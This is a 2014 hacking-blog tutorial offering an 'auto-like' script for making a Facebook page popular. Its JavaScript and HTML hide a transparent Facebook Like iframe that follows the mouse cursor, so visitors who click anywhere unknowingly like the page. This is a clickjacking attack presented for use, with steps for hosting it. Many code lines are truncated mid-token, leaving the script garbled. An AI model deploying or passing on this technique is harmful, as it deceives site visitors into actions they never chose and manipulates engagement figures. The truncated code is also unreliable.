- Back to Home »
- hacking »
- How To Get You Page Famous On Facebook Fast: Auto-Like Script:-
Posted by : Unknown
March 16, 2014
How To Get You Page Famous On Facebook Fast: Auto-Like Script:-
If you have a website or planning to create one, this simple tutorial will teach you how to get likes for your page really fast in a few easy steps.
1) Open notepad
2) Copy-paste the following code:
This goes to HEAD:
<script src=”http://code.jquery.com/
<script type=”text/javascript”>
var interval;
$(function()
{
interval=setInterval(“
});
function updateActiveElement()
{
if ( $(document.activeElement).
{
clearInterval(
iflag=1;
}
}
</script>
The location of this doesn’t really matter:
<div style=”overflow: hidden; width: 10px; height: 12px; position: absolute; filter:alpha(opacity=0); -moz-opacity:0.0; -khtml-opacity: 0.0; opacity: 0.0;” id=”icontainer”>
<iframe src=”http://www.facebook.com/
<!–end facebook like frame code–>
</div>
<script>
var iflag = 0;
var icontainer = document.getElementById(‘
var standardbody=(document.
function mouseFollower(e){
/*
if (window.event)
{ // for IE
icontainer.style.top = (window.event.y-5)+
icontainer.style.left = (window.event.x-5)+
}
else
{
icontainer.style.top = (e.pageY-5)+’px’;
icontainer.style.left = (e.pageX-5)+’px’;
}
}
document.onmousemove = function(e) {
if (iflag == 0) {mouseFollower(e);}
}
</script>
3) Save it as “name.html” (the name doesn’t really matter, it can be anything you want)
It should look like this:
4)Register to 000webhost.com, this is where you should create your website.